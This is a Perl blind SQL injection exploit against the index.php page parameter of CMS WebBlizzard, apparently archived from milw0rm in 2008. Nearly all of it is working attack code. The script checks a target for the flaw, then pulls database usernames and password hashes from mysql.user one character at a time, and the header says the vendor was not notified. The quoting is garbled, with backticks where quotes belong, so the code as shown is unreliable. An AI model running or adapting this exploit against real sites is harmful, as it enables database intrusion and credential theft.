CMS WebBlizzard (index.php page) Blind SQL Injection Exploit#/usr/bin/perl

#|+| Vendor Not Notified
#|+| Author: Bl@ckbe@rD
#|+| Discovered On: 10 june  2008
#|+| greetz: InjEctOrs , underz0ne crew 
#--//-->
# -- CMS webBlizzard  Blind SQL Injection Exploit --
#--//--> Exploit :
use strict;
use LWP::Simple;

print `-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-\n`;
print `-                                                                  -\n`;
print `-                                                                  -\n`;
print `-                                                                  -\n`;
print `-         CMS WebBlizzard  Blind SQL Injection exploit             -\n`;
print `-                                                                  -\n`;
print `-                                                                  -\n`;
print `+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n`;

print `\nEnter URL (ie: http://site.com): `;
	chomp(my $url=<STDIN>);
	
if(inject_test($url)) {
	print `Injecting.. Please Wait this could take several minutes..\n\n`;
	my $details = blind($url);
	print `Exploit Success! Admin Details: `.$details;
	exit;
}

sub blind {

	my $url    = shift;
	my $res    = undef;
	my $chr    = 48;
	my $substr = 1;
	my $done   = 1;
	
	while($done) {
		my $content = get($url.`/index.php?page=6)  and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM 
mysql.user),`.$substr.`,1))=`.$chr.`/*`);
		
		if($content =~ /Previous/ &amp;&amp; $chr == 94) { $done = 0; }
			elsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; }
				else { $chr++; }
	}
	return $res;
}

sub inject_test {

	my $url     = shift;
	my $true    = get($url.`/index.php?page=6) and 1=1 /*`);
	my $false   = get($url.`/index.php?page=6) and 1=2 /*`);
	
	if($true =~ /Previous/ &amp;&amp; $false !~ /Previous/) {
		print `\nTarget Site Vulnerable!\n\n`;
		return 1;
	} else { print `\nTarget Site Not Vulnerable! Exiting..\n`; exit; }
}

# milw0rm.com [2008-07-03]